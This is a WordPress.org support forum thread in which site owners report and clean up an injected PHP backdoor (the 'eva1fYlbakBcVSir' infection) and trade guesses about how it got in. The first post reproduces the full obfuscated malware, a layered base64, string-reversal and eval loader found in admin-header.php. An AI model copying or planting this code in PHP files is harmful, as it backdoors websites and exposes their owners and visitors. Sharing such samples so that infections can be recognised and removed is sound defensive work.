WordPress.org

Ready to get started?Download WordPress

Forums

java exploit hack in wp 3.3. beta (29 posts)

  1. 256studio
    Member
    Posted 2 years ago #

    I just got a java exploit error from my anti-virus and I cant log into my admin of my site.
    This is what my virus program called it.
    Exploit:Java/CVE-2010-0840.KM

    http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Exploit%3aJava%2fCVE-2010-0840.KM&threatid=2147649278

    The exploit start at line 127 of the wp-admin/admin-header.php file

    if ( $parent_file == 'options-general.php' )
    	require(ABSPATH . 'wp-admin/options-head.php');
    <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "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pO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>
  2. Diegazo
    Member
    Posted 2 years ago #

    I have wordpress 3.2.1 and i had the same problem. Yo need to delate that lines in all your index.php files (themes, wp-content...) and your blog will work again ;)

  3. mrcupp
    Member
    Posted 2 years ago #

    i've got it on 2 sites; second time in a month since installing/upgrading to 3.2.1

    @diegazo, easy fix yes; total pain when one site is over 500 instances of the exploit ;-)

    i've found it in the following places in my sites:

    *home.php
      *index.php
      *default.php
  4. Diegazo
    Member
    Posted 2 years ago #

    @mrcupp

    Yes, the hack is in all files with that name (or if they have that words in the name). I've WordPress MU and i deleted all files by hand (over 90).

    We discover the problem. It's about timthumb.php. We were atacked on September, and yesterday. We fix the problem on September (update timthumb, clean .htaccess), but we didn't clean themes cache (Minimal, Coldstone...), and there were two malicious files (php and png). That files were the last visited before yesterday atack. The IP was 83.103.119.239. Erase all that files and all will be ok.

  5. mrcupp
    Member
    Posted 2 years ago #

    @diegazo, exactly the same on my primary site (running MU) that got hit in sept as well. totally forgot about the cache in the themes :( 600 files to clean up...wpmu site had about 50 themes on it, and around 25 plugins.

  6. Chip Bennett
    Theme Review Admin
    Posted 2 years ago #

    I don't think this is alpha/beta-testing related.

  7. 256studio
    Member
    Posted 2 years ago #

    I was using the beta version of wp when this happen. But I have other site that got hit at the sane time that was using 3.2.1

  8. Chip Bennett
    Theme Review Admin
    Posted 2 years ago #

    I was using the beta version of wp when this happen.

    Right, but that's just coincidental. You'll get better response by posting in the correct forum, i.e. How-To and Troubleshooting; the people monitoring the Alpha/Beta forum are generally looking for WP 3.3 bugfixes, and would probably be less-likely to respond to a general site-hack topic in that forum.

    Fortunately, one of the moderators moved your post for you. :)

  9. thabob
    Member
    Posted 2 years ago #

    Here is what I used to fix it, without restoring backups. Had over 2000 clients's files infected. Use it at your own risks or advice your sysadmin to run it.

    [Code moderated as per the Forum Rules. The maximum number of lines of code that you can post in these forums is ten lines. Please use the pastebin]

  10. 256studio
    Member
    Posted 2 years ago #

    thabob, you need to turn that into a plugin.. that say runs a cron job on a time schedule...

  11. thabob
    Member
    Posted 2 years ago #

    I need to find the source first, I am not even sure it is a WordPress that caused this. I did not found any file named timthumb.php. I also have joomlaa, drupal and wikis installed. Plus it appears my WPs were working fine.

    Make it run as a cron job once solve this problem, it just recover if your backup procedure is to heavy.

  12. mrcupp
    Member
    Posted 2 years ago #

    the first time the exploit occurred for me was back in sept, and was a hijacked .htaccess file that was including a "Thumbs.DB" file, which was in the root of the wordpress install. It contained the same line of code that is included at the end of all the infected .php files.

    I have a copy of the most recent hack, and can put it up on a hackpad if needed. I however don't have the original Thumbs.DB file since I purged it after the last cleanup.

  13. MickeyRoush
    Member
    Posted 2 years ago #

    the first time the exploit occurred for me was back in sept, and was a hijacked .htaccess file that was including a "Thumbs.DB" file, which was in the root of the wordpress install.

    Thumb.db is a Windows (MS) construct. I notice that some theme/plugin developers leave that and the Mac version (DS_Store) in their directories by accident. Strange that you found one in the root.

    I have a copy of the most recent hack, and can put it up on a hackpad if needed.

    Can you put it up on pastebin (please use pastebin per forum rules) and post the link here? I'd like to examine it.

  14. mrcupp
    Member
    Posted 2 years ago #

    @MickeyRoush, it's a known exploit that has been popping up on a lot of WP based sites (which are probably not up to date on security releases). I don't think it really is WP related though. I've found a few friends who have been affected by this same exploit on servers w/out WP installed. It is more than likely an exploit tied back to phpMyAdmin or a server out-of-date on it's security releases. (i know mine is out of date for a few apps).

    the Thumbs.DB exploit was talked about here a few months back actually. here is the link to that forum entry: http://wordpress.org/support/topic/where-to-start-on-this-htaccess-issue

    here's is the ta"offical" release about the "Tim Thumb" 0day exploit: http://www.hackersbay.in/2011/08/tim-thumb-wordpress-exploit.html

    here is the link to the pastebin I just made for this as well: http://wordpress.pastebin.ca/2090298

  15. MickeyRoush
    Member
    Posted 2 years ago #

    the Thumbs.DB exploit was talked about here a few months back actually. here is the link to that forum entry: http://wordpress.org/support/topic/where-to-start-on-this-htaccess-issue

    Thanks for the link on that. I wasn't aware of the thumbs.db exploit.

    I am aware of the the timthumb exploit. I had to create my own directives to stop the fingerprinting of it.

    Checking out pastebin now.......thanks.

  16. ktaylor
    Member
    Posted 2 years ago #

    Hi all,
    We have this issue on our website also. We have gone through deleting the code from the php files, but I have not touched the cache. Can I just delete the cache in the themes folder or do I have to do something else? Is there anything else I need to look for?
    THANKS!! Kaz

  17. alnmco
    Member
    Posted 2 years ago #

    I first got this on Oct 20 though I'm just noticing it today after finding a long suspicious code ...((!isset($eva1fYlbakBcVSir) in my header, footer, and index file. Throughout the week users were reporting that there antivirus blocked my site because of a trojan.

    FYI - I'm completely up to date with wordpress and am using 3.2.1.

    I've deleted all of the malicious code and am in the process of securing things better.

  18. mjjones
    Member
    Posted 2 years ago #

    Found this !isset bit today again even in Twentyten and TwentyEleven themes which I had never used. But my Contact 7 is clean.
    And I got in on 2 sites which didn't have Contact 7.
    And my sites had the latest WP and all plugins updated.
    So there must be various entrances.

  19. ravage
    Member
    Posted 2 years ago #

    I have been fighting this for about a year on installs at work. I traced it back to an occurrence in 2008 on one of the sites. A false user had been injected into the database. But the real source of the constant re- infection seemed to be..... "Hello Dolly". Even though the plugin was inactive. once I found the code inside of it and removed it- the attacks stopped (fingers crossed) it has been 2 months sine I had to remove the crap from my indexes, headers, and footers- so I hope that was it.
    I did, of curse remove the hidden user- but I did get hit again after that. I had to comb through basically ever .php file to find it.
    Of course it's possible that this exploit wears many masks- but if it happens- check you're hellow dolly- since it's in every install- it's a really good target.

  20. 256studio
    Member
    Posted 2 years ago #

    First thing I do is delete the hello Dolly plugin once I install Wp.

  21. Chip Bennett
    Theme Review Admin
    Posted 2 years ago #

    The Hello Dolly Plugin was infected on your install, but it was not the source of the exploit. There's nothing in Hello Dolly even to be exploited, AFAIK. It just hooks some text strings into a hook in the admin header.

  22. tekno23
    Member
    Posted 2 years ago #

    Just FYI, I found a partly-written cleanup PERL substitution, which runs much quicker than the PHP, and is useful for anybody who has shell access to their installation.

    I fixed the quoted strings issues and turned it into a shellscript using a simple 'find' to get the files to clean, which I've put onto pastebin here - http://pastebin.com/8vvWpFR8

  23. audioel
    Member
    Posted 2 years ago #

    Tekno23 - thank you so much for doing that! Worked great, and I had a LOT of sites to run it on.

    Does anyone have any idea how this code is getting injected in?

  24. adpawl
    Member
    Posted 2 years ago #

    @audioel, check this in your server logs

  25. daviddevor
    Member
    Posted 2 years ago #

    @tekno23
    Man you rock. My work has a VPS with over 50 wordpress installs and most of them were infected that perl script saved my life and at least a days worth of work. AWESOME!

  26. Victoria
    Member
    Posted 2 years ago #

    @tekno23, @audioel, @daviddevor
    Please guide me how to use this 'Bash/Perl fix for "eva1fYlbakBcVSir" WP Backdoor/Malware' code.

    I'm using VPS as well. ever since I changed to VPS I've been getting this infection on my sites. I was able to find which files got infected and replaced with original files, but they were keep coming back with backdoors which is unable to find..

    Sounds like http://pastebin.com/8vvWpFR8 by tekno23 is the alternative way to prevent the infection. But I have no idea how to use this though... :(

    On my cPanel, I've just created a new key for SSH and made it authorized (SSH/Shell Access). and clicked 'Perl Modules', (page looks like this)....now my head turned to black.... @_@

    I'll be so appreciated if someone can give any tip how to use this.
    Thanks and best regards.

  27. daviddevor
    Member
    Posted 2 years ago #

    @hyky314

    You need to run this script after you log in with ssh and have the command prompt.

    This will not prevent future attacks, it just helps in removing all segments of the code from your files. Look at the thrid post from Jan talking about securing your site from future attacks. If your files are already cleared out than you need to take a look at those links and make sure you dont have security issues with your plugins or .htaccess files. Also check your mySQL users and make sure you recognize all of them. This can be another culprit for malware.

    Hope this helps.

  28. taloweb
    Member
    Posted 2 years ago #

    I used a .php file to find infected files and fix it...but I would like to know if the malware entered through a security breach on the server or on WP...

Topic Closed

This topic has been closed to new replies.

About this Topic